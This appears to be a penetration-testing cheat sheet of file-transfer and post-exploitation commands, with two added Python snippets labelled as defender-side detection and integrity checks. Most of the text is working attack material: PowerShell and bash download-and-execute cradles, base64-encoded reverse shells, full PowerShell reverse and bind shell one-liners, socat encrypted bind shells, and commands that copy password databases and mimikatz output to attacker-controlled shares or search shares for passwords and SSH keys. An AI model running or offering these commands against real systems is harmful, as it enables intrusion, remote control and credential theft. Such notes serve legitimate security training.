https://resources.infosecinstitute.com/topic/tunneling-and-port-forwarding-tools-used-during-red-teaming-assessments/
Serve files from attack box
https://medium.com/@dr.spitfire/ocsp-file-transfer-recipe-for-delicious-post-exploitation-a407e00f7346
- Start a web server on your local (attack) machine
php -S localhost:8090
python -m http.server 8090
python -m SimpleHTTPServer 8090
python3 -m http.server 7331
ruby -run -e httpd . -p 9000
busybox httpd -f -p 10000
# Linux
wget http://[IP_ATTACKER]/file
# getting a shell with wget
wget -q -O ss.sh 10.10.15.71/shell.sh;bash ss.sh
echo -n "IEX(New-Object Net.WebClient).DownloadString('http://172.16.40.5/reverse_shell_windows.ps1')" | iconv -t UTF-16LE | base64 -w 0
then cmd /c powershell -nop -enc {ENCODED_SHELL}
# Windows
powershell IEX(New-Object Net.WebClient).DownloadString('http://172.16.40.5/reverse_shell_windows.ps1');
powershell IEX(New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');
# From memory
powershell -nop -exec bypass -c "iex(iwr -uri 192.168.10.10/pwn.ps1 -usebasicparsing)"
# this fetches pwn.ps1, which contains:
Invoke-WebRequest -Uri 192.168.10.10 -OutFile C:\windows\Temp\shell.exe;
Start-Process -NoNewWindow -FilePath C:\windows\Temp\shell.exe;
# From Disk
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/1mK64oH'); Invoke-AllChecks"
powershell -c wget "http://10.14.8.179:8000/shell-x86.exe" -outfile "reverso.exe"
powershell -c "(new-object System.Net.WebClient).Downloadfile('http://10.8.1.234:8000/nc.exe', 'C:\Windows\System32\spool\drivers\color\nc.exe')"
Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
iwr http://10.10.14.5/winPEASany.exe -outf winpeas.exe
certutil -urlcache -f http://ip/file c:\windows\temp\file
c:\windows\system32\cmd.exe /c wget http://172.16.40.5/shell_3434.exe C:\Windows\temp\shell_3434.exe
certutil -urlcache -f http://172.16.40.5/reverse_shell_windows.ps1 C:\Windows\System32\spool\drivers\color\reverse.ps1
copy C:\Users\john\Documents\password_manager.kdbx \\10.10.0.9\kali\password_man
cmd.exe /c ping -n2 10.10.0.9
Multiple steps
echo $storageDir = $pwd >wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://[kali ip]/[file]" >>wget.ps1
echo $file = "[file]" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Extract file through conversion
encode reverse shell (Windows)
cat rev.ps1 | iconv -t UTF-16LE | base64 -w 0
then powershell -nop -enc {ENCODED_SHELL}
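Added defender-side example, not part of the original notes: the reverse of the iconv/base64 recipe used here and for the DownloadString one-liner earlier. Given process command lines (the Sysmon Event ID 1 source is an assumption; the sample lines are constructed), it pulls the -enc argument, decodes base64 then UTF-16LE, and flags download-cradle markers.

```python
import base64
import re
from typing import Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match "-e<letters>" followed by a base64 blob and validate the prefix in code.
FLAG_RE = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)")
# Substrings that indicate a download-and-execute cradle in the decoded script.
CRADLE_MARKERS = ("downloadstring", "downloadfile", "iex", "invoke-expression",
                  "invoke-webrequest", "iwr", "net.webclient")

def extract_encoded(cmdline: str) -> Optional[str]:
    """Return the base64 argument of an -EncodedCommand style flag, if present."""
    for m in FLAG_RE.finditer(cmdline):
        if "encodedcommand".startswith(m.group(1).lower()):
            return m.group(2)
    return None

def decode_encoded_command(b64: str) -> Optional[str]:
    """Reverse the recipe above: base64 -> UTF-16LE bytes -> script text."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # bad base64 or odd byte count
        return None

def find_cradles(script: str) -> list:
    low = script.lower()
    return [m for m in CRADLE_MARKERS if re.search(r"\b" + re.escape(m) + r"\b", low)]

def analyse(cmdline: str) -> dict:
    """Classify one process command line (e.g. Sysmon Event ID 1 CommandLine)."""
    b64 = extract_encoded(cmdline)
    if b64 is None:
        return {"encoded": False, "script": None, "cradles": []}
    script = decode_encoded_command(b64)
    return {"encoded": True, "script": script,
            "cradles": find_cradles(script) if script else []}

def encode_like_page(script: str) -> str:
    """Same transform as: echo -n "<script>" | iconv -t UTF-16LE | base64 -w 0"""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample command lines; the first mirrors the cradle shown above.
SAMPLE_SCRIPT = "IEX(New-Object Net.WebClient).DownloadString('http://172.16.40.5/reverse_shell_windows.ps1')"
SAMPLE_CMDLINES = [
    "cmd /c powershell -nop -enc " + encode_like_page(SAMPLE_SCRIPT),
    "powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]
```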
encode data for easy transfer
certutil -encode 20210906053417_BloodHound.zip loot.txt
Convert file to base64
[Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\Users\file_bloodhound.zip'))
Copy and paste base64 to Kali
echo -n UEsDBC0AAAAIAECYZFJoTtTS== > file_bloodhound.zip.b64
Convert base64 file to zip archive
cat file_bloodhound.zip.b64 | base64 -d > file_bloodhound.zip
Windows unzip file
powershell.exe Expand-Archive -Path pe.zip -DestinationPath C:\xampp\htdocs\gym\upload -Force
Convert sqlite db to base64
# Print the db in base64
base64 -w 0 file.db
# Then copy the data over to attack box to decode
echo "XXX" | base64 -d > db
Reduce size of executable
Reduce/optimize the file size with upx, an executable packer (also known as a PE compression tool):
upx -9 nc.exe
We can convert nc.exe to a Windows script (.cmd) with the exe2hex tool
exe2hex -x nc.exe -p nc.cmd
To run it on the Windows machine, the script instructs powershell.exe to assemble it back into a binary.
# save the .hex file as a .bat and run it
copy nc.hex nc.bat
./nc.bat
Use share
- Start a share in your kali system
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support kali .
- Retrieve the data while on the victim machine (Windows)
copy \\[ATTACKER_IP]\kali\somefile /path/somefile copy Firefox.lnk \\IP\kali net view \\[IP] dir \\[IP]
# mount drives on Windows
net use abcd: \\kali_ip\myshare
net use abcd: /d # disconnect
net use abcd: /delete # then delete
Authenticated access
/home/clobee/.local/bin/smbserver.py -smb2support kali . -username clobee -password clobee
net use x: \\192.168.45.154\kali /user:clobee clobee
copy Documents\Database.kdbx x:\Database.kdbx
# delete the share
net use x: /d
TCP connection between two machines for “chat”
On kali
nc -l -p1234
On victim machine
nc 10.10.10.10 1234
PHP upload
Kali: PHP upload script
mkdir /tmp/uploads
chown www-data: /tmp/uploads
# save the script as upload_shell.php in the web root so the URLs below resolve
<?php
$uploaddir = '/tmp/uploads/';
// basename() keeps the client-supplied name from escaping the upload directory
$uploadfile = $uploaddir . basename($_FILES['file']['name']);
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
Windows:
powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload_shell.php', 'file.zip')
(New-Object System.Net.WebClient).UploadFile('http://192.168.119.145/upload_shell.php', '/challenge/powershell-uploads')
TFTP + FTP
FTP server on Kali
sudo pip install pyftpdlib
python -m pyftpdlib -p21 -w
On Kali:
sudo apt update && sudo apt install atftp
mkdir /tftp # DIRECTORY HOSTING FILES
sudo chown nobody: /tftp
sudo atftpd --daemon --port 69 /tftp
On Windows (old machines, < Windows XP):
tftp -i [kali ip] get [file]
tftp -i [kali ip] put [file]
–
On Kali:
#!/bin/bash
sudo apt update && sudo apt install pure-ftpd
sudo groupadd ftpgroup
sudo useradd -g ftpgroup -d /dev/null -s /etc ftpuser
sudo pure-pw useradd offsec -u ftpuser -d /tmp/ftphome # use user offsec when logging into ftp
sudo pure-pw mkdb
cd /etc/pure-ftpd/auth/
sudo ln -s ../conf/PureDB 60pdb
mkdir -p /tmp/ftphome # DIRECTORY HOSTING FILES
sudo chown -R ftpuser:ftpgroup /tmp/ftphome/
sudo service pure-ftpd restart
On Windows:
echo open [kali ip] 21> ftp.txt
echo USER offsec>> ftp.txt # username
echo ftp>> ftp.txt # password
echo bin>> ftp.txt # binary mode
echo GET [file]>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt
# or
echo open [kali ip] 21>ftp.txt&echo USER offsec>>ftp.txt&echo ftp>>ftp.txt&echo bin>>ftp.txt&echo GET [file]>>ftp.txt&echo bye>>ftp.txt&ftp -v -n -s:ftp.txt
Troubleshooting
501 Server cannot accept argument.
FTP client is in Active mode, client side firewall does not allow command.
To fix: use passive mode
This program cannot be run in DOS mode.
Use binary mode when copying files via FTP.
Any binary you transfer via FTP requires you to set your FTP session to binary.
#Use binary mode
binary
put file.exe
#Passive mode
passive
# typing passive x2 = binary
ftp -p 10.11.1.12
#List all files
dir -a
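As an added illustration (not part of the original notes) of the binary-mode caveat: an ASCII-mode transfer rewrites each 0x0A byte as 0x0D 0x0A, which shifts every later offset, so the DOS header's e_lfanew no longer points at the "PE\0\0" signature. The blob below is a constructed minimal PE-like header standing in for nc.exe, not a real executable.

```python
import hashlib
import struct

def is_intact_pe(data: bytes) -> bool:
    """MZ magic at 0, and e_lfanew (at 0x3C) must point at the PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"

def simulate_ascii_mode(data: bytes) -> bytes:
    """What an ASCII-mode (non-binary) FTP transfer to Windows does to raw bytes."""
    return data.replace(b"\n", b"\r\n")

def build_minimal_pe() -> bytes:
    """Constructed test blob, not a real executable: DOS header with e_lfanew=0x80,
    a stub that contains 0x0A bytes (real DOS stubs do too), then the PE signature."""
    header = bytearray(0x80)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x80)
    header[0x40:0x4C] = b"stub\x0Athis\x0A!!"  # 12 bytes, two of them newlines
    return bytes(header) + b"PE\0\0" + b"\0" * 20

def transfer_report(original: bytes, received: bytes) -> dict:
    """Compare the copy that arrived on the target against the one you served."""
    return {
        "sha256_match": hashlib.sha256(original).digest() == hashlib.sha256(received).digest(),
        "size_delta": len(received) - len(original),
        "pe_intact": is_intact_pe(received),
    }
```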
On Windows, check which process is listening on a specific port
powershell.exe Get-Process -Id (Get-NetTCPConnection -LocalPort 8888).OwningProcess
Catch reverse shell on machine (without curl or nc)
https://www.grobinson.me/reverse-shells-even-without-nc-on-linux/
On kali
nc -nvlp 4444
On victim machine
bash -c "bash &>/dev/tcp/192.168.119.203/4444 <&1"
then on kali
python -c "import pty;pty.spawn('/bin/bash')"
Use stream with netcat
- In the victim machine, open a connection
nc -nvlp 443 > incoming.sh
- From attack machine, send file to a machine
nc -nv [VICTIM_IP] [PORT] < LinEnum.sh
Admin on a Windows box but don’t have Chisel?
netsh interface portproxy #Like ssh port forwarding
Get the script in the machine (linpeas.sh)
From github
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
wget -qO- https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash
Local network
sudo python -m SimpleHTTPServer 80 #Host
curl 10.10.10.10/linpeas.sh | sh #Victim
wget -qO- 10.10.10.10/linpeas.sh | sh
Without curl
sudo nc -q 5 -lvnp 80 < linpeas.sh #Host
cat < /dev/tcp/10.10.16.3/80 | sh #Victim
Execute from memory and send output back to the host
nc -lvnp 9002 | tee linpeas.out #Host
curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim
Output to file
./linpeas.sh -a > /dev/shm/linpeas.txt #Victim
less -r /dev/shm/linpeas.txt #Read with colors
Use a linpeas binary
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64
chmod +x linpeas_linux_amd64
./linpeas_linux_amd64
Use python
python -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content)' > deepce.sh
python3 -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content.decode("utf-8"))' > deepce.sh
Upload with curl
curl.exe -F 'file=@C:\\temp\\supersecret.txt' http://172.16.1.30
Run an exe (as a process)
Start-Process -NoNewWindow -FilePath C:\Windows\Tasks\rev.exe
Use SCP on Kali
- Start SSH in the attack machine
root@kali:# systemctl start ssh.socket
- In the victim machine, copy the file across
PS C:\Users\Administrator> scp .\20200609093439_loot.zip root@[KALI_IP]:/root/loot.zip
Socat Encrypted Bind shells
- Victim
Once we generate the key, we will cat the certificate and its private key into a file, which we will eventually use to encrypt our bind shell.
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem
We will use the OPENSSL-LISTEN option to create the listener on port 443, cert=bind_shell.pem to specify our certificate file, verify to disable SSL verification, and fork to spawn a child process once a connection is made to the listener:
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
sudo socat OPENSSL-LISTEN:1337,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
- Attacker
From Bob's Windows machine we connect to Alice's bind shell.
We will use - to transfer data between STDIO and the remote host, OPENSSL to establish a remote SSL connection to Alice's listener on 10.11.0.4:443, and verify=0 to disable SSL certificate verification:
socat - OPENSSL:10.11.0.4:443,verify=0
socat - OPENSSL:192.168.145.52:1337,verify=0
SMB
Create a windows share
net share DataShare=c:\Data /remark:"Clobee share..."
nmap -p 139,445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.11.1.5
crackmapexec smb 172.16.2.2
crackmapexec smb -u '%' -p '' --shares 172.31.1.2
crackmapexec smb -u '%' -p '' -M spider_plus
cat /tmp/cme_spider_plus/<ip>.json | jq '. |map_values(keys)'
# Retrieve a file
netexec smb <IP> -u u -H 'myhash' --get-file "C:\windows.old\Windows\System32\SYSTEM" SYSTEM
smbmap -R folder -H 10.10.10.11
smbmap -R folder -H 10.10.10.11 -A file.txt -q
smbmap -u "%" -p "" -H 192.168.220.152
Search shares for files containing the word pass
crackmapexec smb <ip> -u '<user>' -p '<pass>' -d '<domain>' --shares --spider "C$" --pattern "pass"
Display the files within each readable share, traversing directories at the specified depth (I recommend 2 or 3 since the higher the depth the longer it will take):
smbmap -H <ip> -u '<user>' -p '<pass>' -d '<domain>' -R --depth 2
Retrieve files
smbget -R smb://10.10.10.178/Data/ -U TempUser
Retrieve all files
smbclient //$IP/ShareDir -c 'recurse;ls'
# See crackmapexec -M spider_plus
smbclient -N -L \\\\IP | grep Disk | sed 's/^\s*\(.*\)\s*Disk.*/\1/' | while read share; do echo "======${share}======"; smbclient -N "//IP/${share}" -c dir; echo; done
smbclient "\\\\172.31.1.4\\Office_share" -c 'prompt OFF;recurse ON;mget *' -U '%'
smbclient '\\10.10.11.1\home' -N -c 'prompt OFF;recurse ON;cd "path\to\directory\";lcd "~/path/to/download/to/";mget *'
prompt OFF;recurse ON; mget *
# Then recursive reads
find . -type f -exec echo -e '\n===\n' \; -exec cat {} \;
proxychains -q smbclient '\\developer\Users' -N -c 'prompt OFF;recurse ON;cd "\tom\Desktop\";lcd "/home/here/";mget *' -U 'admin%pass'
smbget -R smb://<ip>/anonymous
proxychains -q smbclient -L \\developer -U 'admin%pass'
Copy a file on a machine
smbclient -c 'put myinstaller.msi' -U t1_corine.waters -W ZA '//thmiis.za.tryhackme.com/admin$/' Korine.1994
Display all files
smbclient //192.168.110.71/xxx -c 'ls' password -U username
smbclient -L 192.168.110.71
smbclient -L \\10.10.11.1 -U ''
smbclient //192.168.110.71/backups
smbclient -L //xxx.xxx.xxx.xxx/ -U user_name -m SMB2
smbclient -N //IP/tmp --option='client min protocol=NT1'
Search for interesting files
crackmapexec smb -d acme.corp -u administrator -p "P@ssw0rd" --spider "*" --exclude-dirs "addins,ADFS,appcompat,apppatch,AppReadiness,assembly,bcastdvr,Boot,Branding,CbsTemp,Cluster,Containers,CSC,Cursors,debug,diagnostics,DiagTrack,DigitalLocker,dot3svc,Downloaded Program Files,drivers,en-US,Fonts,GameBarPresenceWriter,Globalization,Help,IdentityCRL,IME,ImmersiveControlPanel,INF,InputMethod,Installer,L2Schemas,LiveKernelReports,Logs,Media,Microsoft.NET,Migration,Minidump,ModemLogs,OCR,Offline Web Pages,Panther,Performance,PLA,PolicyDefinitions,Prefetch,PrintDialog,Program Files,Program Files (x86),Provisioning,Registration,RemotePackages,rescache,Resources,SchCache,schemas,security,ServiceProfiles,ServiceState,servicing,Setup,ShellComponents,ShellExperiences,SKB,SoftwareDistribution,Speech,Speech_OneCore,System,System32,SystemApps,SystemResources,SysWOW64,TAPI,Tasks,Temp,tracing,twain_32,Vss,WaaS,Web,Windows,WinSxS,wlansvc" --pattern passw ssh username id_rsa id_ed25519 .pub --only-files ~/Scope/all.txt
Display a file (from inside smbclient)
# In smbclient
smb: \> get file.txt /dev/tty
rpcclient (then enumdomainusers)
showmount -e 10.10.96.135
nmap -p 111 --script nfs* 10.11.1.72
mkdir /tmp/localshare; mount 10.10.96.135:/shares /tmp/localshare
sudo mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
sudo mount -v -t nfs -o vers=2 <IP>:<SHARE> <DIRECTORY>
sudo mount -t cifs -o 'user=clobee' //10.10.10.34/users /mnt/users
sudo mount -t cifs //10.10.10.34/users -o username=adm,password='pass' /mnt/users
sudo mount -t cifs -o credentials=~/Downloads/credentials,dir_mode=0755,file_mode=0755 //10.185.10.34/users /mnt/users
sudo mount -o nolock 10.11.1.72:/home ~/home/
mkdir /home/clobee/Downloads/boxes/10.10.10.100/Users;
mount 10.10.10.100:/Users /home/clobee/Downloads/boxes/10.10.10.100/Users
Check the permissions (ACLs) on share files
smbcacls --no-pass //10.10.10.11/Users file
for i in $(ls /mnt/users); do echo $i; smbcacls --no-pass //10.10.10.11/Users $i; echo; done
Powershell reverse shell
Reverse shell
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.164',135);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Bind shell
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
In kali
nc -nv IP PORT
RDP mounting shared folder
Using xfreerdp:
# On Kali:
xfreerdp /cert-ignore /compression /auto-reconnect /u:offsec /p:lab /v:192.168.212.250 /w:1600 /h:800 /drive:test,/home/kali/Documents/pen-200
# On windows:
copy mimikatz.log \\tsclient\test\mimikatz.log
Using rdesktop:
# On Kali:
rdesktop -z -P -x m -u offsec -p lab 192.168.212.250 -r disk:test=/home/kali/Documents/pen-200
# On Windows:
copy mimikatz.log \\tsclient\test\mimikatz.log
Responder
sudo python3 /opt/Responder/Responder.py -I tun0 -wv
Troubleshoot
NT_STATUS_CONNECTION_DISCONNECTED: use "smbclient -N //10.10.10.3/tmp --option='client min protocol=NT1'"
NT_STATUS_CONNECTION_RESET: use "-m SMB2"
NT_STATUS_IO_TIMEOUT dns issue
Or set, under [global] in /etc/samba/smb.conf:
client min protocol = CORE
client max protocol = SMB3
— OR
Add host to /etc/hosts / DNS server.
Debug process: use a network traffic analyser to pinpoint the issue
tcpdump -i <network interface>